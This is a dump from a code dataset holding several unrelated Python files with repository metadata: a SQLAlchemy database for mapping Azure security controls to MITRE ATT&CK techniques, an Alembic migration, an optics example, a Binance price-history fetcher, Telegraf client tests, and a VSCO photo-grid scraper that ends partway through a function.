] | 20 | 2021-06-29T12:59:45.000Z | 2022-03-29T12:53:50.000Z | tools/db/database.py | Petes77/Azure-Security-Stack-Map | a02b9a178e3756680c9ec511159bf8f2d7ff50f3 | [
"Apache-2.0"
] | 22 | 2021-07-06T01:03:19.000Z | 2022-03-24T22:33:17.000Z | import yaml
from sqlalchemy import create_engine, func, and_, or_
from sqlalchemy.orm import sessionmaker
from db.model import Base, Tactic, Technique, SubTechnique, Mapping, Tag, \
MappingSubTechniqueScore, MappingTechniqueScore, Score, tactic_and_technique_xref
class MappingDatabase:
def __init__(self, attack_ds, db_file):
self.attack_ds = attack_ds
self.engine = create_engine(f"sqlite:///{db_file}")
Base.metadata.create_all(self.engine)
Session = sessionmaker()
Session.configure(bind=self.engine)
self.session = Session()
def init_database(self, mapping_files, tags, skip_attack):
if skip_attack:
self.session.query(MappingTechniqueScore).delete()
self.session.query(MappingSubTechniqueScore).delete()
self.session.query(Score).delete()
self.session.query(Mapping).delete()
self.session.query(Tag).delete()
self.session.commit()
else:
Base.metadata.drop_all(self.engine)
Base.metadata.create_all(self.engine)
self.build_attack_database()
self.build_mapping_database(mapping_files, tags)
def query_mapping_files(self, tags, relationship, control_names, platforms):
if tags:
mapping_entities = self.session.query(Mapping).select_from(Mapping)\
.join(Mapping.tags).filter(Tag.name.in_(tags)).group_by(Mapping.mapping_id)
if relationship == "AND":
mapping_entities = mapping_entities.having(func.count(Tag.tag_id) == len(tags))
else:
mapping_entities = self.session.query(Mapping)
if control_names:
control_filters = []
for control in control_names:
control_filters.append(Mapping.name.like(f"%{control}%"))
mapping_entities = mapping_entities.filter(and_(or_(*control_filters)))
if platforms:
platform_filters = []
for platform in platforms:
platform_filters.append(Mapping.platform.like(f"%{platform}%"))
mapping_entities = mapping_entities.filter(and_(or_(*platform_filters)))
return mapping_entities
def get_sub_technique_ids(self, attack_ids):
ids = []
for attack_id in attack_ids:
if "." in attack_id:
ids.append(attack_id)
else:
ids.extend([value[0] for value in self.session.query(SubTechnique.attack_id).\
join(Technique).filter(Technique.attack_id == attack_id).all()])
return ids
def query_mapping_file_scores(self, categories, attack_ids, controls, level, platforms, scores, tactics, tags):
if level == "Technique":
sql = self.session.query(Mapping,Technique,Score).select_from(MappingTechniqueScore)\
.join(Mapping).join(Technique).join(Score).join(tactic_and_technique_xref).join(Tactic)\
.join(Mapping.tags, isouter=True)
else:
sql = self.session.query(Mapping,SubTechnique,Score).select_from(MappingSubTechniqueScore)\
.join(Mapping).join(SubTechnique).join(Score).join(Technique).join(tactic_and_technique_xref).join(Tactic)\
.join(Mapping.tags, isouter=True)
filters = []
if categories:
filters.append(Score.category.in_(categories))
if attack_ids:
if level == "Technique":
filters.append(Technique.attack_id.in_(attack_ids))
else:
attack_ids = self.get_sub_technique_ids(attack_ids)
filters.append(SubTechnique.attack_id.in_(attack_ids))
if controls:
control_filters = []
for control in controls:
control_filters.append(Mapping.name.like(f"%{control}%"))
filters.append(and_(or_(*control_filters)))
if platforms:
platform_filters = []
for platform in platforms:
platform_filters.append(Mapping.platform.like(f"%{platform}%"))
filters.append(or_(*platform_filters))
if scores:
filters.append(Score.value.in_(scores))
if tactics:
tactics_filters = []
for tactic in tactics:
tactics_filters.append(Tactic.name.like(f"%{tactic}%"))
filters.append(or_(*tactics_filters))
if tags:
tags_filters = []
for tag in tags:
if tag.startswith('"'):
tags_filters.append(Tag.name == tag.replace('"', ""))
else:
tags_filters.append(Tag.name.like(f"%{tag}%"))
filters.append(or_(*tags_filters))
sql = sql.filter(and_(*filters))
if level == "Technique":
return sql.order_by(Mapping.name.asc(), Technique.attack_id.asc())
else:
return sql.order_by(Mapping.name.asc(), SubTechnique.attack_id.asc())
def insert_score(self, score_yaml):
score = Score(category=score_yaml["category"], value=score_yaml["value"], comments=score_yaml.get("comments",""))
self.session.add(score)
return score
def insert_technique_score(self, mapping, technique, score):
mapping_score = MappingTechniqueScore(mapping=mapping,
technique=technique, score=score)
self.session.add(mapping_score)
def insert_sub_technique_score(self, mapping, sub_technique, score):
mapping_score = MappingSubTechniqueScore(mapping=mapping,
sub_technique=sub_technique, score=score)
self.session.add(mapping_score)
def build_mapping_database(self, mapping_files, tags):
all_tags = []
for platform in tags:
all_tags.extend(tags[platform])
all_tags = list(set(all_tags))
for tag in all_tags:
tag_entity = Tag()
tag_entity.name = tag
self.session.add(tag_entity)
self.session.flush()
for mapping_file in mapping_files:
with open(mapping_file, "r") as f:
mapping_yaml = yaml.safe_load(f)
mapping_entity = Mapping()
mapping_entity.name = mapping_yaml["name"]
mapping_entity.path = str(mapping_file)
mapping_entity.platform = mapping_yaml["platform"]
mapping_entity.description = mapping_yaml["description"]
self.session.add(mapping_entity)
yaml_tags = mapping_yaml.get("tags", [])
if yaml_tags:
tag_entities = self.session.query(Tag).filter(Tag.name.in_(yaml_tags)).all()
mapping_entity.tags.extend(tag_entities)
for technique_yaml in mapping_yaml.get("techniques", []):
technique = self.session.query(Technique).filter(Technique.attack_id == technique_yaml["id"]).first()
for score_yaml in technique_yaml["technique-scores"]:
score = self.insert_score(score_yaml)
self.insert_technique_score(mapping_entity, technique, score)
for sub_technique_score_yaml in technique_yaml.get("sub-techniques-scores", []):
for score_yaml in sub_technique_score_yaml["scores"]:
score = self.insert_score(score_yaml)
for sub_technique_yaml in sub_technique_score_yaml["sub-techniques"]:
sub_technique = self.session.query(SubTechnique).\
filter(SubTechnique.attack_id == sub_technique_yaml["id"]).first()
self.insert_sub_technique_score(mapping_entity, sub_technique, score)
self.session.commit()
def build_attack_database(self):
tactics = self.attack_ds.get_tactics()
for tactic_name, tactic_id in tactics.items():
tactic_entity = Tactic()
tactic_entity.name = tactic_name
tactic_entity.attack_id = tactic_id
self.session.add(tactic_entity)
techniques = self.attack_ds.get_tactic_techniques(tactic_name)
for technique in techniques:
technique_name = technique["name"]
attack_id = self.attack_ds.get_attack_id(technique)
technique_entity = self.session.query(Technique).filter_by(attack_id=attack_id).first()
if not technique_entity:
technique_entity = Technique()
technique_entity.name = technique_name
technique_entity.attack_id = self.attack_ds.get_attack_id(technique)
technique_entity.tactics.append(tactic_entity)
self.session.add(technique_entity)
else:
technique_entity.tactics.append(tactic_entity)
self.session.commit()
sub_ts = self.attack_ds.get_subtechniques()
for sub_tech in sub_ts:
attack_id = self.attack_ds.get_attack_id(sub_tech)
technique_id = attack_id.split('.')[0]
technique = self.session.query(Technique).filter_by(attack_id=technique_id).one()
sub_tech_entity = SubTechnique()
sub_tech_entity.name = sub_tech["name"]
sub_tech_entity.attack_id = attack_id
sub_tech_entity.technique = technique
self.session.add(sub_tech_entity)
self.session.commit() | 42.450893 | 123 | 0.617205 | 1,048 | 9,509 | 5.341603 | 0.109733 | 0.056985 | 0.042872 | 0.016077 | 0.296892 | 0.239014 | 0.18846 | 0.151483 | 0.100393 | 0.083244 | 0 | 0.000293 | 0.282469 | 9,509 | 224 | 124 | 42.450893 | 0.820167 | 0 | 0 | 0.214286 | 0 | 0 | 0.025657 | 0.002208 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054945 | false | 0 | 0.021978 | 0 | 0.10989 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d13ea815378d2a8a1669b8154361a07477e30abf | 791 | py | Python | migrations/versions/e2cfee316e0a_.py | chrononyan/ok | 1c83e419dd8d5ef64c1e03a7f8a218e65a9fb7cf | [
"Apache-2.0"
] | 148 | 2018-07-03T02:08:30.000Z | 2022-03-26T04:03:35.000Z | migrations/versions/e2cfee316e0a_.py | chrononyan/ok | 1c83e419dd8d5ef64c1e03a7f8a218e65a9fb7cf | [
"Apache-2.0"
] | 856 | 2015-01-10T04:27:20.000Z | 2018-06-27T14:43:23.000Z | migrations/versions/e2cfee316e0a_.py | chrononyan/ok | 1c83e419dd8d5ef64c1e03a7f8a218e65a9fb7cf | [
"Apache-2.0"
] | 69 | 2015-01-26T08:06:55.000Z | 2018-06-25T12:46:03.000Z | """Add web submission changes
Revision ID: e2cfee316e0a
Revises: ed0359c3b84b
Create Date: 2016-08-08 16:41:43.369433
"""
# revision identifiers, used by Alembic.
revision = 'e2cfee316e0a'
down_revision = 'ed0359c3b84b'
from alembic import op
import sqlalchemy as sa
import server
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('assignment', sa.Column('upload_info', sa.Text(), nullable=True))
op.add_column('assignment', sa.Column('uploads_enabled', sa.Boolean(), nullable=False))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('assignment', 'uploads_enabled')
op.drop_column('assignment', 'upload_info')
### end Alembic commands ###
| 26.366667 | 91 | 0.710493 | 98 | 791 | 5.642857 | 0.510204 | 0.115732 | 0.075949 | 0.083183 | 0.260398 | 0.260398 | 0.159132 | 0.159132 | 0 | 0 | 0 | 0.06577 | 0.154235 | 791 | 29 | 92 | 27.275862 | 0.760837 | 0.384324 | 0 | 0 | 0 | 0 | 0.255507 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.272727 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d13ec4b0d7f2db6046479acea69224b528393498 | 968 | py | Python | examples/matrix/PlanePair.py | will-hossack/Poptics | 4093876e158eb16421dfd4e57818210b11381429 | [
"MIT"
] | null | null | null | examples/matrix/PlanePair.py | will-hossack/Poptics | 4093876e158eb16421dfd4e57818210b11381429 | [
"MIT"
] | null | null | null | examples/matrix/PlanePair.py | will-hossack/Poptics | 4093876e158eb16421dfd4e57818210b11381429 | [
"MIT"
] | null | null | null | """
Example code to take a system of two thick singlet lenses the first on art 50 mm
and plot the focal length of as the second lens is moved from 60 to 100 mm.
"""
from poptics.matrix import ParaxialThickLens
from poptics.ray import RayPencil, RayPath
import matplotlib.pyplot as plt
def main():
lens = ParaxialThickLens(30,0.025,1.61,10.0,-0.035,5.0)
lens.setFocalLength(50) # Scale to 50 mm focal length
print(repr(lens))
mag = -0.3
obj,ima = lens.planePair(50,mag) # Make pair of planes
print("Object Plane : " + str(repr(obj)))
print("New Image Plane : " + str(repr(ima)))
# Make paraxial pencil from a point on object plane
pencil = RayPencil().addSourceParaxialBeam(lens,-0.5*obj.getHeight(), obj)
pencil.addMonitor(RayPath())
pencil *= lens
pencil *= ima
# Draw diagram
lens.draw(True)
obj.draw()
ima.draw()
pencil.draw()
plt.axis("equal")
plt.show()
main()
| 25.473684 | 80 | 0.655992 | 145 | 968 | 4.37931 | 0.537931 | 0.012598 | 0.037795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046791 | 0.227273 | 968 | 37 | 81 | 26.162162 | 0.802139 | 0.286157 | 0 | 0 | 0 | 0 | 0.055965 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.136364 | 0 | 0.181818 | 0.136364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d143003f63f0fd659540ddc8ab29e9880dd6fa30 | 3,310 | py | Python | Get_Symbol_Info.py | joao-aguilera-c/Binance-Algo-Trading-Bot | 859f971cf7b7f99c1c930157f22e44b801b8007c | [
"MIT"
] | 5 | 2021-09-17T15:48:08.000Z | 2022-03-13T22:56:30.000Z | Get_Symbol_Info.py | joao-aguilera-c/Binance-Algo-Trading-Bot | 859f971cf7b7f99c1c930157f22e44b801b8007c | [
"MIT"
] | null | null | null | Get_Symbol_Info.py | joao-aguilera-c/Binance-Algo-Trading-Bot | 859f971cf7b7f99c1c930157f22e44b801b8007c | [
"MIT"
] | 5 | 2021-09-17T02:07:41.000Z | 2022-02-09T09:15:36.000Z | import datetime
import os
import pandas as pd
from binance.client import Client
import main as ws
from strategies import strutcnow
def get_file_names(dir): # 1.Get file names from directory
file_list = os.listdir(dir)
for index, item in enumerate(file_list):
file_list[index] = item[:-4]
return file_list
def TsToStrgCsvFormat(time):
t = datetime.datetime.utcfromtimestamp(time / 1000.0)
return t.strftime('%Y.%m.%d %H:%M:%S')
async def get_symbol_info(client, semanal_symbol_list, directory):
binance_client = client
# print("%s - Programa iniciado" % strutcnow())
# 2.To rename files
files = get_file_names(directory)
# print(files)
minutes_15 = pd.to_timedelta(15, unit='m')
days_60 = pd.to_timedelta(62, unit='D')
time_now = datetime.datetime.utcnow() - minutes_15
for week_symbols in semanal_symbol_list:
# print('%s - mining new values from %s' % (strutcnow(), s))
df = pd.read_csv('%s/%s.csv' % (directory, week_symbols), header=None)
last_rec_date = datetime.datetime.strptime(df[0].iloc[-1], '%Y.%m.%d %H:%M:%S') + minutes_15
# print('%s < %s' % (last_rec_date, time_now))
if last_rec_date < time_now:
"""print('%s - last mined candle was at: %s. Mining more.' % (strutcnow(),
datetime.datetime.strptime(
df[0].iloc[-1],
'%Y.%m.%d %H:%M:%S')))"""
candles_dataset = await binance_client.get_historical_klines(week_symbols,
Client.KLINE_INTERVAL_15MINUTE,
last_rec_date.strftime(
"%m/%d/%Y %H:%M:%S"),
time_now.strftime(
"%m/%d/%Y %H:%M:%S"))
if candles_dataset != []:
df = pd.DataFrame(candles_dataset)
df = df.iloc[:, :-7]
df[0] = [TsToStrgCsvFormat(time) for time in df[0]]
if ws.get_last_csv_candle_time(directory, week_symbols) != df[0].iloc[-1]:
print('%s - %s -> update from: %s to time: %s' %
(strutcnow(),
week_symbols,
ws.get_last_csv_candle_time(directory, week_symbols),
df[0].iloc[-1]))
df.to_csv('%s/%s.csv' % (directory, week_symbols), mode='a', header=False, index=False)
else:
print("{} - Algo errado com o {}, binance não foi capaz de enviar dados.".format(
strutcnow(), week_symbols))
else:
print('%s - %s já atualizado' % (strutcnow(), week_symbols))
if __name__ == "__main__":
get_symbol_info(semanal_symbol_list=['BTCUSD', 'ETHUSD'], directory=r'/Symbols', client=None)
| 43.552632 | 108 | 0.475529 | 357 | 3,310 | 4.207283 | 0.319328 | 0.065912 | 0.009987 | 0.021305 | 0.201065 | 0.177097 | 0.173103 | 0.117177 | 0.117177 | 0.117177 | 0 | 0.016802 | 0.406647 | 3,310 | 75 | 109 | 44.133333 | 0.747963 | 0.064048 | 0 | 0.041667 | 0 | 0 | 0.090978 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.125 | 0 | 0.208333 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d143a02b68ba758261d56c1b88719e38bf7f10ac | 7,674 | py | Python | telegraf/tests.py | gdunstone/pytelegraf | 695a91af6e735c193200bdc4d99c0907c72fac85 | [
"MIT"
] | null | null | null | telegraf/tests.py | gdunstone/pytelegraf | 695a91af6e735c193200bdc4d99c0907c72fac85 | [
"MIT"
] | null | null | null | telegraf/tests.py | gdunstone/pytelegraf | 695a91af6e735c193200bdc4d99c0907c72fac85 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from telegraf.client import ClientBase, TelegrafClient, HttpClient
from telegraf.protocol import Line
from telegraf.utils import format_string, format_value
import unittest
import mock
class TestLine(unittest.TestCase):
def test_format_key(self):
self.assertEquals(format_string('foo'), 'foo')
self.assertEquals(format_string('foo,bar'), 'foo\,bar')
self.assertEquals(format_string('foo bar'), 'foo\ bar')
self.assertEquals(format_string('foo ,bar'), 'foo\ \,bar')
self.assertEquals(format_string('foo ,bar,baz=foobar'), 'foo\ \,bar\,baz\=foobar')
def test_format_value(self):
self.assertEquals(format_value('foo'), '"foo"')
self.assertEquals(format_value('foo bar'), '"foo bar"')
self.assertEquals(format_value('foo "and" bar'), '"foo \"and\" bar"')
self.assertEquals(format_value(123), "123i")
self.assertEquals(format_value(123.123), "123.123")
self.assertEquals(format_value(True), "t")
self.assertEquals(format_value(False), "f")
oversixtyfourk_str = u''.join([chr(32 + (i % 767)) for i in range(0, 300 + 2**16)])
self.assertLess(len(format_value(oversixtyfourk_str).encode('utf-8')), 2**16)
def test_single_value(self):
self.assertEquals(
Line('some_series', 1).to_line_protocol(),
'some_series value=1i'
)
def test_single_value_and_tags(self):
self.assertEquals(
Line('some_series', 1, {'foo': 'bar', 'foobar': 'baz'}).to_line_protocol(),
'some_series,foo=bar,foobar=baz value=1i'
)
def test_multiple_values(self):
self.assertEquals(
Line('some_series', {'value': 232.123, 'value2': 123}).to_line_protocol(),
'some_series value=232.123,value2=123i'
)
def test_multiple_values_and_tags(self):
self.assertEquals(
Line('some_series', {'value': 232.123, 'value2': 123}, {'foo': 'bar', 'foobar': 'baz'}).to_line_protocol(),
'some_series,foo=bar,foobar=baz value=232.123,value2=123i'
)
def test_tags_and_measurement_with_whitespace_and_comma(self):
self.assertEquals(
Line(
'white space',
{'value, comma': "foo"},
{'tag with, comma': 'hello, world'}
).to_line_protocol(),
"""white\ space,tag\ with\,\ comma=hello\,\ world value\,\ comma="foo\""""
)
def test_boolean_value(self):
self.assertEquals(
Line('some_series', True).to_line_protocol(),
'some_series value=t'
)
def test_value_escaped_and_quoted(self):
self.assertEquals(
Line('some_series', 'foo "bar"').to_line_protocol(),
'some_series value="foo \"bar\""'
)
def test_with_timestamp(self):
self.assertEquals(
Line('some_series', 1000, timestamp=1234134).to_line_protocol(),
'some_series value=1000i 1234134'
)
def test_tags_ordered_properly(self):
self.assertEquals(
Line('some_series', 1, {'a': 1, 'baa': 1, 'AAA': 1, 'aaa': 1}).to_line_protocol(),
'some_series,AAA=1,a=1,aaa=1,baa=1 value=1i'
)
def test_tags_filter_invalid_tags(self):
self.assertEquals(
Line('some_series', 1, {'a': 1, "invalid1": "", "invalid2": None, "_invalid3": "invalidvalue"}).to_line_protocol(),
'some_series,a=1 value=1i'
)
def test_values_ordered_properly(self):
self.assertEquals(
Line('some_series', {'a': 1, 'baa': 1, 'AAA': 1, 'aaa': 1}).to_line_protocol(),
'some_series AAA=1i,a=1i,aaa=1i,baa=1i'
)
class TestClientBase(unittest.TestCase):
def test_zero_value(self):
self.client = ClientBase()
self.client.send = mock.Mock()
self.client.metric('some_series', 0)
self.client.send.assert_called_with('some_series value=0i')
def test_null_value(self):
self.client = ClientBase()
self.client.send = mock.Mock()
self.client.metric('some_series', None)
self.assertEqual(self.client.send.call_count, 0)
def test_empty_values_dict(self):
self.client = ClientBase()
self.client.send = mock.Mock()
self.client.metric('some_series', {})
self.assertEqual(self.client.send.call_count, 0)
def test_some_zero_values(self):
self.client = ClientBase()
self.client.send = mock.Mock()
self.client.metric('some_series', {'value_one': 1, 'value_zero': 0, 'value_none': None})
self.client.send.assert_called_with('some_series value_one=1i,value_zero=0i')
class TestTelegraf(unittest.TestCase):
def setUp(self):
self.host = 'host'
self.port = 1234
self.addr = (self.host, self.port)
def test_sending_to_socket(self):
self.client = TelegrafClient(self.host, self.port)
self.client.socket = mock.Mock()
self.client.metric('some_series', 1)
self.client.socket.sendto.assert_called_with(b'some_series value=1i\n', self.addr)
self.client.metric('cpu', {'value_int': 1}, {'host': 'server-01', 'region': 'us-west'})
self.client.socket.sendto.assert_called_with(b'cpu,host=server-01,region=us-west value_int=1i\n', self.addr)
def test_global_tags(self):
self.client = TelegrafClient(self.host, self.port, tags={'host': 'host-001'})
self.client.socket = mock.Mock()
self.client.metric('some_series', 1)
self.client.socket.sendto.assert_called_with(b'some_series,host=host-001 value=1i\n', self.addr)
self.client.metric('some_series', 1, tags={'host': 'override-host-tag'})
self.client.socket.sendto.assert_called_with(b'some_series,host=override-host-tag value=1i\n', self.addr)
def test_utf8_encoding(self):
self.client = TelegrafClient(self.host, self.port)
self.client.socket = mock.Mock()
self.client.metric(u'meäsurement', values={u'välue': 1, u'këy': u'valüe'}, tags={u'äpples': u'öranges'})
self.client.socket.sendto.assert_called_with(
b'me\xc3\xa4surement,\xc3\xa4pples=\xc3\xb6ranges k\xc3\xaby="val\xc3\xbce",v\xc3\xa4lue=1i\n', self.addr)
class TestTelegrafHttp(unittest.TestCase):
def setUp(self):
self.host = 'host'
self.port = 1234
self.url = 'http://{host}:{port}/write'.format(host=self.host, port=self.port)
def test_sending_to_http(self):
self.client = HttpClient(self.host, self.port)
self.client.future_session = mock.Mock()
self.client.metric('some_series', 1)
self.client.future_session.post.assert_called_with(url=self.url, data='some_series value=1i')
self.client.metric('cpu', {'value_int': 1}, {'host': 'server-01', 'region': 'us-west'})
self.client.future_session.post.assert_called_with(url=self.url,
data='cpu,host=server-01,region=us-west value_int=1i')
def test_global_tags(self):
self.client = HttpClient(self.host, self.port, tags={'host': 'host-001'})
self.client.future_session = mock.Mock()
self.client.metric('some_series', 1)
self.client.future_session.post.assert_called_with(data='some_series,host=host-001 value=1i', url=self.url)
self.client.metric('some_series', 1, tags={'host': 'override-host-tag'})
self.client.future_session.post.assert_called_with(data='some_series,host=override-host-tag value=1i',
url=self.url)
| 40.819149 | 127 | 0.625228 | 999 | 7,674 | 4.622623 | 0.156156 | 0.095279 | 0.056301 | 0.057168 | 0.725206 | 0.663924 | 0.603075 | 0.555652 | 0.479212 | 0.444132 | 0 | 0.031967 | 0.221397 | 7,674 | 187 | 128 | 41.037433 | 0.740921 | 0.002737 | 0 | 0.297297 | 0 | 0.087838 | 0.20863 | 0.061758 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.162162 | false | 0 | 0.033784 | 0 | 0.222973 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d1457af1ca58311f6c25338ec5321a3e6e4342ad | 13,396 | py | Python | vscope/vscope.py | baronvonbadguy/vscope | a0f94ac81728749387ee5f8074055a7708668189 | [
"MIT"
] | 2 | 2015-12-12T00:43:12.000Z | 2018-02-14T01:27:33.000Z | vscope/vscope.py | baronvonbadguy/vscope | a0f94ac81728749387ee5f8074055a7708668189 | [
"MIT"
] | null | null | null | vscope/vscope.py | baronvonbadguy/vscope | a0f94ac81728749387ee5f8074055a7708668189 | [
"MIT"
] | null | null | null | from collections import defaultdict, OrderedDict
from os import path as osp
from Queue import Queue
import re
import json
import os
import math
import argparse
import requests as rq
from requests.status_codes import codes
from bs4 import BeautifulSoup as bs
from tqdm import tqdm
from skimage import color
from skimage import io
from shared import ap, grab_logger, list_of_dicts_to_dict, dump_json, load_json
from threads import ThreadJSONWriter, ThreadMetadataRequest, ThreadCacheImageData
from analyzer import Analyzer
log = grab_logger()
class Image:
top_level_attributes = (
'upload_date',
'is_featured',
'height',
'width',
'description',
'tags',
'permalink',
'responsive_url',
'_id',
'is_video',
'grid_name',
'perma_subdomain',
'site_id'
)
supplementary_attributes_to_flatten = {
'iso': ('image_meta', 'ios'),
'model': ('image_meta', 'model'),
'make': ('image_meta', 'make'),
'preset': ('preset', 'short_name'),
'preset_bg_color': ('preset', 'color')
}
def __init__(self,
details,
session,
cached_image_width=None,
):
self._raw_details = details
tvp = self.top_level_attributes
self.details = {k: details.get(k, None) for k in tvp}
self.details.update(self._flatten_supplementary_attributes())
self.details['camera'] = '{} {}'.format(
self.details['make'],
self.details['model']
)
for param, value in self.details.iteritems():
self.__dict__[param] = value
self._add_param(param, value)
self._enforce_directories()
self.cached_image_width = cached_image_width \
if cached_image_width else self.width
self.session = self.s = session
self.link = 'http://{}?w={}'.format(
self.responsive_url, self.cached_image_width
)
self.local_filename = 'images/{}/{}-{}.jpg'.format(
self.perma_subdomain, self._id, self.cached_image_width
)
def __repr__(self):
return json.dumps(self.details)
def _add_param(self, name, value):
self.details[name] = value
def _flatten_supplementary_attributes(self):
flattened = {}
a = self.supplementary_attributes_to_flatten
for name, (first_lvl_key, second_lvl_key) in a.iteritems():
if first_lvl_key in self._raw_details:
first_level_dict = self._raw_details[first_lvl_key]
if second_lvl_key in first_level_dict:
flattened[name] = first_level_dict[second_lvl_key]
continue
flattened[name] = None
return flattened
def _enforce_directories(self):
path = 'images/{}/'.format(self.perma_subdomain)
if not osp.isdir(path):
os.makedirs(path)
@property
def data_array_rgb(self):
if hasattr(self, '_image_data_rgb'):
return self._image_data_rgb
if not osp.isfile(self.local_filename):
self.cache_image_file()
img = io.imread(self.local_filename)
self._image_data_rgb = img
return img
@property
def data_array_lab(self):
return color.rgb2lab(self.data_array_rgb)
@property
def primary_colors(self):
if hasattr(self, 'primary_colors'):
return self.primary_colors
primary_colors = Analyzer.find_primary_colors(self)
self._add_param('primary_colors', primary_colors)
return primary_colors
def cache_image_file(self):
r = self.s.get(self.link, stream=True)
if r.status_code == codes.all_good:
with open(self.local_filename, 'wb') as f:
r.raw.decode_content = True
for chunk in r.iter_content(1024):
f.write(chunk)
class Grid:
vsco_grid_url = 'http://vsco.co/grid/grid/1/'
vsco_grid_site_id = 113950
def __init__(self, subdomain='slowed', user_id=None):
self.subdomain = subdomain
self._enforce_directories()
self.session = self.s = rq.Session()
self.s.headers.update({
'User-Agent': '''Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3)
AppleWebKit/537.75.14 (KHTML, like Gecko)
Version/7.0.3 Safari/7046A194A'''
})
self.session.cookies.set('vs', self.access_token, domain='vsco.co')
if self.subdomain == 'grid':
self.user_id = self.vsco_grid_site_id
else:
self.user_id = self._grab_user_id_of_owner() \
if not user_id else user_id
self.metadata_filename = '{}.json'.format(self.subdomain)
self.metadata_filepath = ap(osp.join('meta', self.metadata_filename))
self._metadata_exists = lambda: osp.isfile(self.metadata_filepath)
def _enforce_directories(self):
path = 'images/{}/'.format(self.subdomain)
if not osp.isdir(path):
os.makedirs(path)
def _grab_session_response(self, url):
return self.session.get(url)
def _grab_html_soup(self, url):
r = self._grab_session_response(url)
return bs(r.text, 'html.parser')
def _grab_json(self, url):
r = self._grab_session_response(url)
if r.status_code == codes.all_good:
return r.json()
else:
return {}
def _grab_user_id_of_owner(self):
soup = self._grab_html_soup(self.grid_url)
soup_meta = soup.find_all('meta', property='al:ios:url')
user_app_url = soup_meta[0].get('content', None)
matcher = 'user/(?P<user_id>\d+)/grid'
match = re.search(matcher, user_app_url)
if match:
return match.group('user_id')
else:
log.debug('couldn\'t get the user_id out of: {}'
.format(user_app_url))
def _grab_token(self):
soup = self._grab_html_soup(self.vsco_grid_url)
soup_meta = soup.find_all('meta', property='og:image')
tokenized_url = soup_meta[0].get('content', None)
matcher = 'https://im.vsco.co/\d/[0-9a-fA-F]*/(?P<token>[0-9a-fA-F]*)/'
match = re.search(matcher, tokenized_url)
if match:
return match.group('token')
else:
log.debug('couldn\'t get the token out of: {}'
.format(tokenized_url))
def _fetch_media_urls(self, page_limit=None, page_size=1000):
media_url_formatter = lambda token, uid, page, size: \
'https://vsco.co/ajxp/{}/2.0/medias?site_id={}&page={}&size={}'\
.format(token, uid, page, size)
media_url_formatter__page = lambda page, size: \
media_url_formatter(
self.access_token,
self.user_id,
page,
size
)
media_meta_url = media_url_formatter__page(1, 1)
log.debug('Grabbing json response from: {}'.format(media_meta_url))
media_meta = self._grab_json(media_meta_url)
mm_remaining_count = media_meta['total']
page_limit_max = int(math.ceil(mm_remaining_count / float(page_size)))
n_pages = min(page_limit, page_limit_max) if page_limit else page_limit_max
urls = []
for page in range(1, n_pages + 1):
urls.append(media_url_formatter__page(page, page_size))
return urls
def _generate_images(self, cached_image_width=300):
for meta in tqdm(self.metadata.itervalues()):
yield Image(
meta,
self.s,
cached_image_width=cached_image_width
)
def _cache_image_metadata(self):
metadata = [i.details_full for i in self.images]
filename = '{}_{}.json'.format(self.subdomain, self.user_id)
with open(filename, 'w') as f:
json.dump(metadata, f, indent=4)
@property
def metadata(self):
if not getattr(self, '_metadata', None):
self._metadata = self.deserialize_metadata()
return self.deserialize_metadata()
@property
def grid_url(self):
url_base = 'https://vsco.co/{}/grid/1'
return url_base.format(self.subdomain)
@property
def access_token(self):
token = self.s.cookies.get('vs', domain='vsco.co', default=None)
if not token:
token = self._grab_token()
log.debug('Access token grabbed and is: {}'.format(token))
self.s.cookies.set('vs', token, domain='vsco.co')
return token
@property
def size(self):
return len(self.images)
@property
def paginated_media_urls(self):
if not getattr(self, '_media_urls', None):
self._media_urls = self._fetch_media_urls()
log.debug('Built media urls up to page {}'
.format(len(self._media_urls)))
return self._media_urls
def grid_page_url(self, page):
return self.grid_url.replace('/1', '/{}'.format(page))
def grab_attribute_from_all_images(self, attribute):
values = {}
for image in self.images:
attribute_value = image.details.get(attribute, None)
if attribute_value is not None:
values[image._id] = attribute_value
return values
def attribute_freq(self,
attribute,
proportional_values=False,
ascending=False
):
histogram = defaultdict(int)
attributes = self.grab_attribute_from_all_images(attribute)
for v in attributes.values():
histogram[v] += 1
if proportional_values:
total = len(attributes)
